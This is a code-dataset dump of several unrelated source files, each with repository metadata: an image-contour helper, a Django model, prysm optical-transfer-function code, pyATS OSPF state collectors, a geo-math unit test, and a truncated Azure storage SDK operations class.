43f4368447bc13386682a0dcc57ec24178673fc2 | 6ba96477d8f19ca5197b4e5aeae4d67f43c51ca6 | /min_contourss.py | 6e69c22b1cc786cd507a065c628ba93b206ca72c | [] | no_license | jgomezastro/repository | c2b7984fd8c17932e6e1954331293961364c18c4 | 61ffcc660cc697254f5e42d5b52299f1c51bfa33 | refs/heads/master | 2020-08-23T01:20:05.849500 | 2020-02-17T12:40:55 | 2020-02-17T12:40:55 | 216,514,228 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 523 | py | # -*- coding: utf-8 -*-
from numpy import zeros
def min_contourss(extracted_foreground, minaa, maxaa, minab, maxab):
# Extraction of the minimum value of the contour and its coords
a = 255
for i in range(minaa, maxaa):
for j in range(minab, maxab):
if (extracted_foreground[i][j] < a) and (extracted_foreground[i][j]!=0) \
and (extracted_foreground[i][j]!=255):
a = extracted_foreground[i][j]
min_loc = (i, j)
return a, min_loc
| [
"jesus.gomez@terabee.com"
] | jesus.gomez@terabee.com |
bd356ed87d9f9bd2821338991c74afa1757e893f | 8a22ed9db6ec992ef70e6ef8bc19615d9804dbbd | /mylib/models.py | 15204cbc42d9cb2e9a989c14eff2091d6cf35e65 | [] | no_license | owenzs/comp9900_backend | 27f3f9959cefc33d3ce9d3ee9d223b639810e55b | c876c6c8648b33aa00f35c0e4c13b73892e6ed20 | refs/heads/main | 2023-04-05T22:37:49.120236 | 2021-04-14T11:34:28 | 2021-04-14T11:34:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | from django.db import models
import uuid
class MyLib(models.Model): # admin and user use the same category, ID would be created by django
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
lib_user_id = models.ForeignKey('user.Myuser', on_delete=models.CASCADE, default=0)
lib_goods_id = models.ForeignKey('items.ItemInfo', on_delete=models.CASCADE, default=0) | [
"z5196167@ad.unsw.edu.au"
] | z5196167@ad.unsw.edu.au |
929c4b554d91766794b550e36a6c1d59d80404f6 | 2cfc228988a51857269edf2fe7b85c7f9a03e94b | /prysm/otf.py | f6583f6e4089a0dfd734bba53b56f1734431fde1 | [
"MIT"
] | permissive | fakahil/prysm | 93dd2523e6416afa2774435a6df796df8b7b6f37 | c6235043fae90540c392291051d454e8813d3884 | refs/heads/master | 2021-05-18T21:20:46.745298 | 2020-02-18T00:21:27 | 2020-02-18T00:21:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,626 | py | """A base optical transfer function interface."""
import warnings
from .conf import config
from .mathops import engine as e
from ._richdata import RichData
from .psf import PSF
from .fttools import forward_ft_unit
def transform_psf(psf, sample_spacing):
data = e.fft.fftshift(e.fft.fft2(e.fft.ifftshift(psf.data))) # no need to ifftshift first - phase is unimportant
y, x = [forward_ft_unit(sample_spacing / 1e3, s) for s in psf.shape] # 1e3 for microns => mm
return x, y, data
class OTF:
"""Optical Transfer Function."""
def __init__(self, mtf, ptf):
"""Create a new OTF Instance.
Will have .mtf and .ptf attributes holding the MTF and PTF.
Parameters
----------
data : `numpy.ndarray`
complex ndarray, 2D
x : `numpy.ndarray`
x Cartesian spatial frequencies
y : `numpy.ndarray`
y Cartesian spatial frequencies
"""
self.mtf = mtf
self.ptf = ptf
@staticmethod
def from_psf(psf, unwrap=True):
"""Create an OTF instance from a PSF.
Parameters
----------
psf : `PSF`
Point Spread Function
unwrap : `bool`, optional
if True, unwrap phase
Returns
-------
`OTF`
new OTF instance with mtf and PSF attributes holding MTF and PSF instances
"""
x, y, ft = transform_psf(psf, psf.sample_spacing)
mtf = MTF.from_ftdata(ft=ft, x=x, y=y)
ptf = PTF.from_ftdata(ft=ft, x=x, y=y, unwrap=unwrap)
return OTF(mtf=mtf, ptf=ptf)
@staticmethod
def from_pupil(pupil, efl, Q=config.Q, unwrap=True):
psf = PSF.from_pupil(pupil, efl=efl, Q=Q)
return OTF.from_psf(psf, unwrap=unwrap)
class MTF(RichData):
"""Modulation Transfer Function."""
_data_attr = 'data'
_data_type = 'image'
_default_twosided = False
def __init__(self, data, x, y, xy_unit=None, z_unit=None, labels=None):
"""Create a new `MTF` instance.
Parameters
----------
data : `numpy.ndarray`
2D array of MTF data
x : `numpy.ndarray`
1D array of x spatial frequencies
y : `numpy.ndarray`
1D array of y spatial frequencies
units : `Units`
units instance, can be shared
labels : `Labels`
labels instance, can be shared
"""
super().__init__(x=x, y=y, data=data,
xy_unit=xy_unit or config.mtf_xy_unit,
z_unit=z_unit or config.mtf_z_unit,
labels=labels or config.mtf_labels)
@staticmethod
def from_psf(psf):
"""Generate an MTF from a PSF.
Parameters
----------
psf : `PSF`
PSF to compute an MTF from
Returns
-------
`MTF`
A new MTF instance
"""
# some code duplication here:
# MTF is a hot code path, and the drop of a shift operation
# improves performance in exchange for sharing some code with
# the OTF class definition
dat = e.fft.fftshift(e.fft.fft2(psf.data)) # no need to ifftshift first - phase is unimportant
x = forward_ft_unit(psf.sample_spacing / 1e3, psf.samples_x) # 1e3 for microns => mm
y = forward_ft_unit(psf.sample_spacing / 1e3, psf.samples_y)
return MTF.from_ftdata(ft=dat, x=x, y=y)
@staticmethod
def from_pupil(pupil, efl, Q=2):
"""Generate an MTF from a pupil, given a focal length (propagation distance).
Parameters
----------
pupil : `Pupil`
A pupil to propagate to a PSF, and convert to an MTF
efl : `float`
Effective focal length or propagation distance of the wavefunction
Q : `float`
ratio of pupil sample count to PSF sample count. Q > 2 satisfies nyquist
Returns
-------
`MTF`
A new MTF instance
"""
psf = PSF.from_pupil(pupil, efl=efl, Q=Q)
return MTF.from_psf(psf)
@staticmethod
def from_ftdata(ft, x, y):
"""Generate an MTF from the Fourier transform of a PSF.
Parameters
----------
ft : `numpy.ndarray`
2D ndarray of Fourier transform data
x : `numpy.ndarray`
1D ndarray of x (axis 1) coordinates
y : `numpy.ndarray`
1D ndarray of y (axis 0) coordinates
Returns
-------
`MTF`
a new MTF instance
"""
cy, cx = (int(e.ceil(s / 2)) for s in ft.shape)
dat = abs(ft)
dat /= dat[cy, cx]
return MTF(data=dat, x=x, y=y)
@property
def tan(self):
warnings.warn('.tan is deprecated and will be removed in v0.18, please use .slices().x')
return self.slices().x
@property
def sag(self):
warnings.warn('.sag is deprecated and will be removed in v0.18, please use .slices().y')
return self.slices().y
def exact_tan(self, freq):
warnings.warn('.exact_tan is deprecated and will be removed in v0.18, please use .exact_x')
return self.exact_x(freq)
def exact_sag(self, freq):
warnings.warn('.exact_sag is deprecated and will be removed in v0.18, please use .exact_y')
return self.exact_y(freq)
class PTF(RichData):
"""Phase Transfer Function"""
def __init__(self, data, x, y, xy_unit=None, z_unit=None, labels=None):
"""Create a new `PTF` instance.
Parameters
----------
data : `numpy.ndarray`
2D array of MTF data
x : `numpy.ndarray`
1D array of x spatial frequencies
y : `numpy.ndarray`
1D array of y spatial frequencies
units : `Units`
units instance, can be shared
labels : `Labels`
labels instance, can be shared
"""
super().__init__(x=x, y=y, data=data,
xy_unit=xy_unit or config.ptf_xy_unit,
z_unit=z_unit or config.ptf_z_unit,
labels=labels or config.mtf_labels)
@staticmethod
def from_psf(psf, unwrap=True):
"""Generate a PTF from a PSF.
Parameters
----------
psf : `PSF`
PSF to compute an MTF from
unwrap : `bool,` optional
whether to unwrap the phase
Returns
-------
`PTF`
A new PTF instance
"""
# some code duplication here:
# MTF is a hot code path, and the drop of a shift operation
# improves performance in exchange for sharing some code with
# the OTF class definition
# repeat this duplication in PTF for symmetry more than performance
dat = e.fft.fftshift(e.fft.fft2(e.fft.ifftshift(psf.data)))
x = forward_ft_unit(psf.sample_spacing / 1e3, psf.samples_x) # 1e3 for microns => mm
y = forward_ft_unit(psf.sample_spacing / 1e3, psf.samples_y)
return PTF.from_ftdata(ft=dat, x=x, y=y)
@staticmethod
def from_pupil(pupil, efl, Q=2, unwrap=True):
"""Generate a PTF from a pupil, given a focal length (propagation distance).
Parameters
----------
pupil : `Pupil`
A pupil to propagate to a PSF, and convert to an MTF
efl : `float`
Effective focal length or propagation distance of the wavefunction
Q : `float`, optional
ratio of pupil sample count to PSF sample count. Q > 2 satisfies nyquist
unwrap : `bool,` optional
whether to unwrap the phase
Returns
-------
`PTF`
A new PTF instance
"""
psf = PSF.from_pupil(pupil, efl=efl, Q=Q)
return PTF.from_psf(psf, unwrap=unwrap)
@staticmethod
def from_ftdata(ft, x, y, unwrap=True):
"""Generate a PTF from the Fourier transform of a PSF.
Parameters
----------
ft : `numpy.ndarray`
2D ndarray of Fourier transform data
x : `numpy.ndarray`
1D ndarray of x (axis 1) coordinates
y : `numpy.ndarray`
1D ndarray of y (axis 0) coordinates
unwrap : `bool`, optional
if True, unwrap phase
Returns
-------
`PTF`
a new PTF instance
"""
ft = e.angle(ft)
cy, cx = (int(e.ceil(s / 2)) for s in ft.shape)
offset = ft[cy, cx]
if offset != 0:
ft /= offset
if unwrap:
from skimage import restoration
ft = restoration.unwrap_phase(ft)
return PTF(ft, x, y)
def diffraction_limited_mtf(fno, wavelength, frequencies=None, samples=128):
"""Give the diffraction limited MTF for a circular pupil and the given parameters.
Parameters
----------
fno : `float`
f/# of the lens.
wavelength : `float`
wavelength of light, in microns.
frequencies : `numpy.ndarray`
spatial frequencies of interest, in cy/mm if frequencies are given, samples is ignored.
samples : `int`
number of points in the output array, if frequencies not given.
Returns
-------
if frequencies not given:
frequencies : `numpy.ndarray`
array of ordinate data
mtf : `numpy.ndarray`
array of coordinate data
else:
mtf : `numpy.ndarray`
array of MTF data
Notes
-----
If frequencies are given, just returns the MTF. If frequencies are not
given, returns both the frequencies and the MTF.
"""
extinction = 1 / (wavelength / 1000 * fno)
if frequencies is None:
normalized_frequency = e.linspace(0, 1, samples)
else:
normalized_frequency = e.asarray(frequencies) / extinction
try:
normalized_frequency[normalized_frequency > 1] = 1 # clamp values
except TypeError: # single freq
if normalized_frequency > 1:
normalized_frequency = 1
mtf = _difflim_mtf_core(normalized_frequency)
if frequencies is None:
return normalized_frequency * extinction, mtf
else:
return mtf
def _difflim_mtf_core(normalized_frequency):
"""Compute the MTF at a given normalized spatial frequency.
Parameters
----------
normalized_frequency : `numpy.ndarray`
normalized frequency; function is defined over [0, and takes a value of 0 for [1,
Returns
-------
`numpy.ndarray`
The diffraction MTF function at a given normalized spatial frequency
"""
return (2 / e.pi) * \
(e.arccos(normalized_frequency) - normalized_frequency *
e.sqrt(1 - normalized_frequency ** 2))
def longexposure_otf(nu, Cn, z, f, lambdabar, h_z_by_r=2.91):
"""Compute the long exposure OTF for given parameters.
Parameters
----------
nu : `numpy.ndarray`
spatial frequencies, cy/mm
Cn: `float`
atmospheric structure constant of refractive index, ranges ~ 10^-13 - 10^-17
z : `float`
propagation distance through atmosphere, m
f : `float`
effective focal length of the optical system, mm
lambdabar : `float`
mean wavelength, microns
h_z_by_r : `float`, optional
constant for h[z/r] -- see Eq. 8.5-37 & 8.5-38 in Statistical Optics, J. Goodman, 2nd ed.
Returns
-------
`numpy.ndarray`
the OTF
"""
# homogenize units
nu = nu / 1e3
f = f / 1e3
lambdabar = lambdabar / 1e6
power = 5/3
const1 = - e.pi ** 2 * 2 * h_z_by_r * Cn ** 2
const2 = z * f ** power / (lambdabar ** 3)
nupow = nu ** power
const = const1 * const2
return e.exp(const * nupow)
def komogorov(r, r0):
"""Calculate the phase structure function D_phi in the komogorov approximation
Parameters
----------
r : `numpy.ndarray`
r, radial frequency parameter (object space)
r0 : `float`
Fried parameter
Returns
-------
`numpy.ndarray`
"""
return 6.88 * (r/r0) ** (5/3)
def estimate_Cn(P=1013, T=273.15, Ct=1e-4):
"""Use Weng et al to estimate Cn from meteorological data.
Parameters
----------
P : `float`
atmospheric pressure in hPa
T : `float`
temperature in Kelvin
Ct : `float`
atmospheric struction constant of temperature, typically 10^-5 - 10^-2 near the surface
Returns
-------
`float`
Cn
"""
return (79 * P / (T ** 2)) * Ct ** 2 * 1e-12
| [
"brandondube@gmail.com"
] | brandondube@gmail.com |
131cc18fb3d3f4d841fc6b9be9bb09e7f8231c84 | c13082434ca12d17cd6c586893db7fe761efb1cc | /build/source_files/ospf.py | 6c3fdc0adcef3fefe6b6a1d8d4c2b5bb0b0f70df | [] | no_license | nupe99/Network-Snapshot-Tool | 255b2a3430c26c484fd787d3f28a110d1398f0ff | 529029d0900417a4a4b76d7b52be60c7936a4a4b | refs/heads/master | 2023-03-30T15:32:26.714593 | 2021-03-25T02:00:22 | 2021-03-25T02:00:22 | 351,275,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,486 | py | from genie.testbed import load
from genie.conf.base import Interface
from unicon.core.errors import ConnectionError
from genie.metaparser.util.exceptions import SchemaEmptyParserError
import sys
def ospf_interfaces_state(devices):
#Create empty dictionary for storing all route results
pre_dic = {}
#Loop over device dictionary
for name, dev_name in devices.items():
#create empty list to store route entries emdeded within complete_dic dictionary
inner_entries = []
#create outer dictionary entry per device
pre_dic.update({name: []})
#pre_dic.update({'data': {name: []}})
#determine if OS type is XE or XR and unpack ospf neighbors output and add to dictionary
if dev_name.os == 'iosxr':
try:
ospf = dev_name.parse('show ospf vrf all-inclusive interface')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
ospf_instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in ospf_instances.keys():
areas = ospf_instances[instance]['areas']
for area in areas:
ospf_interfaces = areas[area]['interfaces']
for ospf_interface in ospf_interfaces.keys():
int_name = ospf_interfaces[ospf_interface]['name']
inner_entries.append(int_name)
pre_dic.update({name: inner_entries})
else:
log.info(f'{name} Not running OSPF. Skipping')
elif (dev_name.os == 'iosxe') or (dev_name.os == 'ios'):
try:
ospf = dev_name.parse('show ip ospf interface')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
ospf_instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in ospf_instances.keys():
areas = ospf_instances[instance]['areas']
for area in areas:
ospf_interfaces = areas[area]['interfaces']
for ospf_interface in ospf_interfaces.keys():
int_name = ospf_interfaces[ospf_interface]['name']
inner_entries.append(int_name)
pre_dic.update({name: inner_entries})
else:
log.info(f'{name} Not running OSPF. Skipping')
elif dev_name.os == 'nxos':
try:
ospf = dev_name.parse('show ip ospf interface')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
ospf_instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in ospf_instances.keys():
areas = ospf_instances[instance]['areas']
for area in areas:
ospf_interfaces = areas[area]['interfaces']
for ospf_interface in ospf_interfaces.keys():
int_name = ospf_interfaces[ospf_interface]['name']
inner_entries.append(int_name)
pre_dic.update({name: inner_entries})
else:
print(f'{name} Not running OSPF. Skipping')
else:
print(f'{dev_name.os} OS type not supported')
return pre_dic
def ospf_neighbors_state(devices):
# Create empty dictionary for storing all route results
pre_dic = {}
# Loop over device dictionary
for name, dev_name in devices.items():
# create outer dictionary entry per device
pre_dic[name] = {}
# determine if OS type is XE or XR and unpack ospf neighbors output and add to dictionary
if dev_name.os == 'iosxr':
try:
ospf = dev_name.parse('show ospf vrf all-inclusive neighbor detail')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
ospf_instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in ospf_instances.keys():
areas = ospf_instances[instance]['areas']
for area in areas.keys():
ospf_interfaces = areas[area]['interfaces']
for interface in ospf_interfaces.keys():
neighbors = ospf_interfaces[interface]['neighbors']
for ospf_id in neighbors.keys():
peer_addresses = neighbors[ospf_id]['address']
peer_router_id = neighbors[ospf_id]['neighbor_router_id']
peer_state = neighbors[ospf_id]['state']
pre_dic[name].update({peer_router_id: {
'peer_router_id': peer_router_id, 'peer_addresses': peer_addresses,
'state': peer_state}})
else:
print(f'{name} Not running OSPF. Skipping')
elif (dev_name.os == 'iosxe') or (dev_name.os == 'ios'):
try:
ospf = dev_name.parse('show ip ospf neighbor detail')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
ospf_instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in ospf_instances.keys():
areas = ospf_instances[instance]['areas']
for area in areas.keys():
ospf_interfaces = areas[area]['interfaces']
for interface in ospf_interfaces.keys():
neighbors = ospf_interfaces[interface]['neighbors']
for ospf_id in neighbors.keys():
peer_addresses = neighbors[ospf_id]['address']
peer_router_id = neighbors[ospf_id]['neighbor_router_id']
peer_state = neighbors[ospf_id]['state']
pre_dic[name].update({peer_router_id: {
'peer_router_id': peer_router_id, 'peer_addresses': peer_addresses,
'state': peer_state}})
else:
print(f'{name} Not running OSPF. Skipping')
elif (dev_name.os == 'nxos'):
try:
ospf = dev_name.parse('show ip ospf neighbors detail')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
ospf_instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in ospf_instances.keys():
areas = ospf_instances[instance]['areas']
for area in areas.keys():
ospf_interfaces = areas[area]['interfaces']
for interface in ospf_interfaces.keys():
neighbors = ospf_interfaces[interface]['neighbors']
for ospf_id in neighbors.keys():
peer_addresses = neighbors[ospf_id]['address']
peer_router_id = neighbors[ospf_id]['neighbor_router_id']
peer_state = neighbors[ospf_id]['state']
pre_dic[name].update({peer_router_id: {
'peer_router_id': peer_router_id, 'peer_addresses': peer_addresses,
'state': peer_state}})
else:
print(f'{name} Not running OSPF. Skipping')
else:
print(f'{dev_name.os} OS type not supported')
return pre_dic
def ospf_spf_state(devices):
# Create empty dictionary for storing all route results
pre_dic = {}
# Loop over device dictionary
for name, dev_name in devices.items():
# create empty list to store route entries emdeded within complete_dic dictionary
inner_entries = []
# create outer dictionary entry per device
pre_dic.update({name: []})
# determine if OS type is XE or XR and unpack ospf neighbors output and add to dictionary
if dev_name.os == 'iosxr':
try:
ospf = dev_name.parse('show ospf vrf all-inclusive')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in instances.keys():
areas = instances[instance]['areas']
for area in areas.keys():
spf_runs = areas[area]['statistics']['spf_runs_count']
pre_dic.update({name: spf_runs})
else:
log.info(f'{name} Not running OSPF. Skipping')
elif (dev_name.os == 'iosxe') or (dev_name.os == 'ios') or (dev_name.os == 'nxos'):
try:
ospf = dev_name.parse('show ip ospf')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in instances.keys():
areas = instances[instance]['areas']
for area in areas.keys():
spf_runs = areas[area]['statistics']['spf_runs_count']
pre_dic.update({name: spf_runs})
else:
log.info(f'{name} Not running OSPF. Skipping')
else:
sys.exit(f'{dev_name.os} OS type not supported')
return pre_dic | [
"nupe99@gmail.com"
] | nupe99@gmail.com |
960b063de1598dccc26a68071d70052b7476c6d6 | 72b65247200e7cc9fd102522e9151ac7a7af3a00 | /Premier-eye.API/tests/test_math.py | 6e6970568ad204be05a77cdcdbd1b1fa0f783620 | [
"MIT"
] | permissive | Sapfir0/premier-eye | 52cfb2a28945e571d3d78e7c993ccaf54e1a0053 | ac6d90da101a5c2f2c305ba21f67369a0f3b786f | refs/heads/master | 2022-12-21T13:29:39.255657 | 2022-12-12T15:10:54 | 2022-12-12T15:10:54 | 195,695,701 | 18 | 4 | MIT | 2021-07-29T18:33:59 | 2019-07-07T20:49:27 | Python | UTF-8 | Python | false | false | 946 | py | import unittest
from services.geo import calibrateRect, divLatLonToNumber, subLatLon, addLatLon, mulLatLonToNumber, imageHeight, imageWidth
from cameraLocations import cameras
def getLatLonCoordinates(A, B, C, D, X, Y):
vBC = divLatLonToNumber(subLatLon(C, B), imageHeight)
vAD = divLatLonToNumber(subLatLon(D, A), imageHeight)
latlonPixel1 = addLatLon(mulLatLonToNumber(vBC, imageHeight- Y), B)
latlonPixel2 = addLatLon(mulLatLonToNumber(vAD, imageHeight - Y), A)
vG = divLatLonToNumber(subLatLon(latlonPixel2, latlonPixel1), imageWidth)
G = addLatLon(mulLatLonToNumber(vG, X), latlonPixel1)
return G
class Test_Math(unittest.TestCase):
def test_isMathEqual(self):
etalon = getLatLonCoordinates(*cameras[3]['view'], int(917.5), int(540))
newRes = calibrateRect(*cameras[3]['view'], int(917.5), int(540))
self.assertEqual(etalon, newRes)
if __name__ == '__main__':
unittest.main() | [
"sapfir999999@yandex.ru"
] | sapfir999999@yandex.ru |
461aedd8d00d14d677bdaaa5d221d39e7bd1f887 | d7016f69993570a1c55974582cda899ff70907ec | /sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2021_04_01/aio/operations/_table_services_operations.py | a773278f633a42e0385983cffb93ca8fbcf3224b | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 17,622 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union, overload
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._table_services_operations import (
build_get_service_properties_request,
build_list_request,
build_set_service_properties_request,
)
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class TableServicesOperations:
    """
    .. warning::
        **DO NOT** instantiate this class directly.
        Instead, you should access the following operations through
        :class:`~azure.mgmt.storage.v2021_04_01.aio.StorageManagementClient`'s
        :attr:`table_services` attribute.
    """
    # NOTE: this class is AutoRest-generated; hand edits will be lost on
    # regeneration. Exposing the models module lets callers reference model
    # types through the operations class.
    models = _models
    def __init__(self, *args, **kwargs) -> None:
        # The generated service client injects client/config/(de)serializer
        # positionally; keyword arguments are accepted as a fallback.
        input_args = list(args)
        self._client = input_args.pop(0) if input_args else kwargs.pop("client")
        self._config = input_args.pop(0) if input_args else kwargs.pop("config")
        self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
        self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
    @distributed_trace_async
    async def list(self, resource_group_name: str, account_name: str, **kwargs: Any) -> _models.ListTableServices:
        """List all table services for the storage account.
        :param resource_group_name: The name of the resource group within the user's subscription. The
         name is case insensitive. Required.
        :type resource_group_name: str
        :param account_name: The name of the storage account within the specified resource group.
         Storage account names must be between 3 and 24 characters in length and use numbers and
         lower-case letters only. Required.
        :type account_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ListTableServices or the result of cls(response)
        :rtype: ~azure.mgmt.storage.v2021_04_01.models.ListTableServices
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        # Map HTTP status codes to the azure-core exceptions raised for them.
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-04-01"))  # type: Literal["2021-04-01"]
        cls = kwargs.pop("cls", None)  # type: ClsType[_models.ListTableServices]
        request = build_list_request(
            resource_group_name=resource_group_name,
            account_name=account_name,
            subscription_id=self._config.subscription_id,
            api_version=api_version,
            template_url=self.list.metadata["url"],
            headers=_headers,
            params=_params,
        )
        # Convert to the transport-level request and resolve the URL template.
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)  # type: ignore
        pipeline_response = await self._client._pipeline.run(  # type: ignore # pylint: disable=protected-access
            request, stream=False, **kwargs
        )
        response = pipeline_response.http_response
        # Anything other than 200 is surfaced as an HTTP error in ARM format.
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.CloudErrorAutoGenerated, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize("ListTableServices", pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    list.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/tableServices"}  # type: ignore
    @overload
    async def set_service_properties(
        self,
        resource_group_name: str,
        account_name: str,
        table_service_name: Union[str, _models.Enum35],
        parameters: _models.TableServiceProperties,
        *,
        content_type: str = "application/json",
        **kwargs: Any
    ) -> _models.TableServiceProperties:
        """Sets the properties of a storage account’s Table service, including properties for Storage
        Analytics and CORS (Cross-Origin Resource Sharing) rules.
        :param resource_group_name: The name of the resource group within the user's subscription. The
         name is case insensitive. Required.
        :type resource_group_name: str
        :param account_name: The name of the storage account within the specified resource group.
         Storage account names must be between 3 and 24 characters in length and use numbers and
         lower-case letters only. Required.
        :type account_name: str
        :param table_service_name: The name of the Table Service within the specified storage account.
         Table Service Name must be 'default'. "default" Required.
        :type table_service_name: str or ~azure.mgmt.storage.v2021_04_01.models.Enum35
        :param parameters: The properties of a storage account’s Table service, only properties for
         Storage Analytics and CORS (Cross-Origin Resource Sharing) rules can be specified. Required.
        :type parameters: ~azure.mgmt.storage.v2021_04_01.models.TableServiceProperties
        :keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
         Default value is "application/json".
        :paramtype content_type: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: TableServiceProperties or the result of cls(response)
        :rtype: ~azure.mgmt.storage.v2021_04_01.models.TableServiceProperties
        :raises ~azure.core.exceptions.HttpResponseError:
        """
    @overload
    async def set_service_properties(
        self,
        resource_group_name: str,
        account_name: str,
        table_service_name: Union[str, _models.Enum35],
        parameters: IO,
        *,
        content_type: str = "application/json",
        **kwargs: Any
    ) -> _models.TableServiceProperties:
        """Sets the properties of a storage account’s Table service, including properties for Storage
        Analytics and CORS (Cross-Origin Resource Sharing) rules.
        :param resource_group_name: The name of the resource group within the user's subscription. The
         name is case insensitive. Required.
        :type resource_group_name: str
        :param account_name: The name of the storage account within the specified resource group.
         Storage account names must be between 3 and 24 characters in length and use numbers and
         lower-case letters only. Required.
        :type account_name: str
        :param table_service_name: The name of the Table Service within the specified storage account.
         Table Service Name must be 'default'. "default" Required.
        :type table_service_name: str or ~azure.mgmt.storage.v2021_04_01.models.Enum35
        :param parameters: The properties of a storage account’s Table service, only properties for
         Storage Analytics and CORS (Cross-Origin Resource Sharing) rules can be specified. Required.
        :type parameters: IO
        :keyword content_type: Body Parameter content-type. Content type parameter for binary body.
         Default value is "application/json".
        :paramtype content_type: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: TableServiceProperties or the result of cls(response)
        :rtype: ~azure.mgmt.storage.v2021_04_01.models.TableServiceProperties
        :raises ~azure.core.exceptions.HttpResponseError:
        """
    @distributed_trace_async
    async def set_service_properties(
        self,
        resource_group_name: str,
        account_name: str,
        table_service_name: Union[str, _models.Enum35],
        parameters: Union[_models.TableServiceProperties, IO],
        **kwargs: Any
    ) -> _models.TableServiceProperties:
        """Sets the properties of a storage account’s Table service, including properties for Storage
        Analytics and CORS (Cross-Origin Resource Sharing) rules.
        :param resource_group_name: The name of the resource group within the user's subscription. The
         name is case insensitive. Required.
        :type resource_group_name: str
        :param account_name: The name of the storage account within the specified resource group.
         Storage account names must be between 3 and 24 characters in length and use numbers and
         lower-case letters only. Required.
        :type account_name: str
        :param table_service_name: The name of the Table Service within the specified storage account.
         Table Service Name must be 'default'. "default" Required.
        :type table_service_name: str or ~azure.mgmt.storage.v2021_04_01.models.Enum35
        :param parameters: The properties of a storage account’s Table service, only properties for
         Storage Analytics and CORS (Cross-Origin Resource Sharing) rules can be specified. Is either a
         model type or a IO type. Required.
        :type parameters: ~azure.mgmt.storage.v2021_04_01.models.TableServiceProperties or IO
        :keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
         Default value is None.
        :paramtype content_type: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: TableServiceProperties or the result of cls(response)
        :rtype: ~azure.mgmt.storage.v2021_04_01.models.TableServiceProperties
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})
        _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
